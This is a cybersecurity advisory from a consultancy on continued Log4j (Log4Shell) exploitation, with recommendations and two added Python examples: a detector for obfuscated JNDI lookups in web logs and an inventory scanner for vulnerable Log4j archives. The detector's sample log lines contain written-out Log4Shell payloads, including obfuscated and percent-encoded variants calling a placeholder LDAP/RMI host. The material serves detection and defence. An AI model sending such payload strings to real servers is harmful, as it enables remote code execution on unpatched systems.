Cybersecurity Threat Advisory: Continued Log4j Scanning Activity
Posted on January 7, 2022 by Mike Beagles
As part of our effort to inform our clients about potential and serious cybersecurity issues, MCP provides advisories about vulnerabilities and exploits that could threaten the operations of their critical communications networks. Sign up to receive these advisories in your inbox as soon as they are released.
This week there is a new critical alert that requires the mission-critical community’s immediate attention.
In recent weeks, Microsoft has observed continued attempts by nation-state adversaries and commodity attackers to exploit security vulnerabilities uncovered in the Log4j open-source logging framework. Scanning activity and exploit attempts for the related vulnerabilities have also been observed as cyberattackers try to deploy malware. MCP strongly recommends identifying every system that embeds Log4j and upgrading it to the latest Log4j release to prevent compromise.
What Is the Threat?
Cyberattackers are continuing their attempts to scan for and exploit the Log4j vulnerability first revealed on December 10, 2021. Microsoft’s Threat Intelligence Center (MSTIC) released guidance earlier this week stating that “exploitation attempts and testing have remained high during the last weeks of December.” Furthermore, they “observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.”
The remote code execution vulnerability in this framework (CVE-2021-44228, widely known as Log4Shell) has emerged as a strong vector for cyberattackers to gain an initial foothold within a network or system. The weeks after the initial disclosure saw four more weaknesses identified in Log4j: CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832. These vary in severity and each requires a non-default configuration to exploit, so none is as broadly exploitable as the original flaw, but they are the reason the fixed version has moved several times. Once cyberattackers gain a foothold through the original vulnerability, they have used it to establish persistent control over the compromised assets, enabling follow-on campaigns such as cryptocurrency mining or ransomware.
Why Is it Noteworthy?
This is especially noteworthy because of how widely Log4j is used. Log4j is an Apache Software Foundation library embedded in a vast number of Java applications, appliances, and services, many of which do not advertise that they include it, so an organization may be exposed through products it did not know contained the framework. An unpatched device may enable a cyberattacker to gain an initial foothold, which they then can use to deploy devastating attacks on a network or system. Scanning attempts are not diminishing, and cyberattackers are also evading string-matching detections by obfuscating the JNDI lookup string that triggers the request to the attacker-controlled site, for example by nesting other Log4j lookups (such as ${lower:j} or ${::-j}) inside it, or by percent-encoding it, so that the literal text ${jndi: never appears in the request. Signatures that key on that literal alone miss these variants; a detection needs to decode and flatten the nested lookups before matching.
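As an added example (not code from the original advisory or from Microsoft), the following Python shows why a literal match on ${jndi: is no longer enough and how a detection can flatten the obfuscation before matching. It percent-decodes the line, then rewrites innermost ${...} lookups inside-out (lower:, upper:, and the ":-" default syntax attackers use to build the word "jndi" letter by letter) until nothing changes. The access-log lines are constructed for the example; 203.0.113.7 is a documentation address and the port numbers are placeholders.

```python
"""Flag Log4Shell probes in web logs even when the JNDI lookup is obfuscated.

Added example for this advisory, not MCP's or Microsoft's detection logic.
The log lines below are constructed; 203.0.113.7 is a documentation address.
"""
import re
from urllib.parse import unquote

# An innermost ${...}: its body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What a JNDI lookup looks like once the layers of obfuscation are flattened.
_JNDI = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|nis|http)://[^\s\"'}]*",
                   re.IGNORECASE)

SAMPLE_LOG_LINES = [  # constructed Apache-style access log entries
    # 1. plain payload in the User-Agent: the only one a literal "${jndi:" match catches
    '10.0.0.5 - - [03/Jan/2022:10:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    # 2. lower:/upper: lookups hide the word "jndi" and the scheme
    '10.0.0.5 - - [03/Jan/2022:10:15:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:LDAP}://203.0.113.7:1389/a}"',
    # 3. empty lookup name with a ":-" default, one letter at a time
    '10.0.0.5 - - [03/Jan/2022:10:15:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7:1389/a}"',
    # 4. env lookup of a variable that does not exist, so its default "j" is used
    '10.0.0.5 - - [03/Jan/2022:10:15:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:rmi://203.0.113.7:1099/a}"',
    # 5. percent-encoded in a query parameter instead of a header
    '10.0.0.5 - - [03/Jan/2022:10:15:05 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    # 6. and 7. benign traffic, including a path that merely contains the word "jndi"
    '10.0.0.9 - - [03/Jan/2022:10:15:06 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [03/Jan/2022:10:15:07 +0000] "GET /docs/log4j-jndi.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def _apply_default(body: str) -> str:
    """${name:key:-fallback}: an unresolvable lookup yields its fallback text."""
    return body.split(":-", 1)[1] if ":-" in body else body


def _resolve(body: str) -> str:
    """Approximate the lookups attackers chain to hide 'jndi'.

    lower:/upper: transform their argument; any lookup with a ':-' default
    (${::-j}, ${env:NOPE:-j}) yields that default; anything else is left as
    its bare body so the rewrite loop always makes progress.
    """
    name, sep, rest = body.partition(":")
    if sep and name.lower() == "lower":
        return _apply_default(rest).lower()
    if sep and name.lower() == "upper":
        return _apply_default(rest).upper()
    return _apply_default(body)


def normalize(text: str, max_rounds: int = 32) -> str:
    """Percent-decode (attackers sometimes double-encode), then flatten nested
    lookups inside-out until nothing changes."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        flattened = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if flattened == text:
            break
        text = flattened
    return text


def naive_match(line: str) -> bool:
    """The literal match many first-day signatures used; obfuscation defeats it."""
    return "${jndi:" in line.lower()


def detect(line: str):
    """Return the flattened JNDI lookup if the line carries one, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(0) if m else None


if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        print(f"naive={str(naive_match(line)):5} flattened={detect(line)}")
```

Run against the constructed lines, the literal match fires only on the first entry, while the normalized detection flags entries 1 through 5 and stays quiet on the two benign ones. The normalizer is deliberately approximate (it does not model every Log4j lookup), so treat it as a triage filter that feeds a blocklist or an alert, not as proof of exploitation.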
What Is the Risk?
Successful exploit attempts may lead to cyberattackers deploying ransomware, cryptocurrency miners, or backdoors on networks and systems. They also may attempt to maintain persistence in a network to exfiltrate sensitive data. In addition, cyberattackers are using this vulnerability as a vector to drop the Meterpreter, Bladabindi (NjRAT), and HabitsRAT remote access tools on network systems, which may give them complete control over a machine.
MSTIC noted that, “at this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments,” and that “due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.”
Meanwhile, the Federal Trade Commission (FTC) also issued a warning that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” In other words, organizations that do not act on this warning may face legal action for failing to secure their network systems adequately against this threat.
What Are the Recommendations?
MCP recommends the following actions to limit the impact of attempted Log4j exploitations:
- Inventory every application and appliance that embeds Log4j, including copies bundled inside other archives (WAR, EAR, and "fat" JAR files), and upgrade each to the latest Log4j release; at the time of this advisory that is 2.17.1 for Log4j 2
- Deploy endpoint protection, which can block the malware cyberattackers deploy once the vulnerability is exploited
- Use a strong password policy and perform account audits regularly to ensure network and system security
- Ensure that services such as Remote Desktop Protocol (RDP) are not exposed to the internet; an exposed RDP service lets a cyberattacker with valid credentials remote into a network or system.
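The first recommendation is harder than it sounds because Log4j is usually bundled inside other archives rather than installed on its own. As an added example that is not MCP's tooling, this Python script inventories archives on disk, recurses into WAR/EAR/fat JARs held in memory, reads the Log4j version from the Maven metadata or the file name, and flags anything below 2.17.1. That threshold is an assumption matching the current Log4j 2 release when this advisory was written; the demo() function builds a constructed directory tree so the script runs offline. It does not touch real artifacts.

```python
"""Inventory Log4j JARs on disk, including copies nested inside WAR/EAR/fat JARs.

Added example for this advisory, not MCP's or Apache's tooling. The version
threshold is an assumption: 2.17.1 was the current Log4j 2 release in early
January 2022 for Java 8+ deployments; adjust it for your platform.
"""
import io
import re
import tempfile
import zipfile
from pathlib import Path

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # Log4j 2.x
JMS_APPENDER_CLASS = "org/apache/log4j/net/JMSAppender.class"               # Log4j 1.x (CVE-2021-4104)
FIXED_VERSION = (2, 17, 1)  # assumption: anything older is reported as needing an update
_FILENAME_VERSION = re.compile(r"log4j(?:-core)?-(\d+\.\d+(?:\.\d+)?)\.jar$")


def parse_version(text):
    """'2.17.1' -> (2, 17, 1); '2.3' -> (2, 3, 0); None when no version is present."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def inspect_archive(data: bytes, label: str, findings: list) -> None:
    """Walk one zip-based archive held in memory and recurse into archives it embeds."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip (or corrupt): nothing to inventory
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:  # Maven metadata is the most reliable version source
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1])
        if version is None:  # fall back to the conventional file name
            m = _FILENAME_VERSION.search(re.split(r"[/\\]", label)[-1])
            if m:
                version = parse_version(m.group(1))
        if version is not None or JNDI_LOOKUP_CLASS in names or JMS_APPENDER_CLASS in names:
            findings.append({
                "archive": label,
                "version": version,
                "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
                "log4j1_jms_appender": JMS_APPENDER_CLASS in names,
                # an unknown version is reported for review, never silently passed
                "needs_update": version is None or version < FIXED_VERSION,
            })
        for name in names:  # nested jars: app.war!WEB-INF/lib/log4j-core-2.14.1.jar
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_paths(root) -> list:
    """Inventory every archive under root; one record per Log4j copy found."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            inspect_archive(path.read_bytes(), str(path), findings)
    return findings


def _fake_log4j_core(version: str) -> bytes:
    """Constructed test artifact: a minimal jar carrying the markers the scanner keys on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        # JndiLookup.class still ships in 2.17.x (disabled by default), so its mere presence is not the verdict
        z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo() -> list:
    """Build a constructed tree (an app WAR embedding 2.14.1, plus a patched 2.17.1 jar) and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        with zipfile.ZipFile(root / "app.war", "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
        (root / "log4j-core-2.17.1.jar").write_bytes(_fake_log4j_core("2.17.1"))
        return scan_paths(root)


if __name__ == "__main__":
    for f in demo():
        flag = "UPDATE" if f["needs_update"] else "ok"
        print(f"[{flag}] {f['archive']} version={f['version']} jndi_lookup={f['jndi_lookup_present']}")
```

Point scan_paths() at an application root (or a whole filesystem) to get the inventory for the first recommendation; vendor-supplied appliances are the usual blind spot, since their archives live outside the directories an administrator normally audits. A version below the threshold needs the vendor's updated build, not a hand-edited jar.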
For more in-depth information about the recommendations, please visit the following link:
If you are looking for guidance, please reach out. MCP offers a comprehensive cybersecurity solutions suite that is designed specifically for public safety and justice entities and other critical infrastructure organizations to help them determine their network, data, and application vulnerabilities. We can help you develop a complete cyberattack prevention strategy. Contact us today to learn more.
Mike Beagles is MCP's director of IT and cybersecurity services. He can be reached here.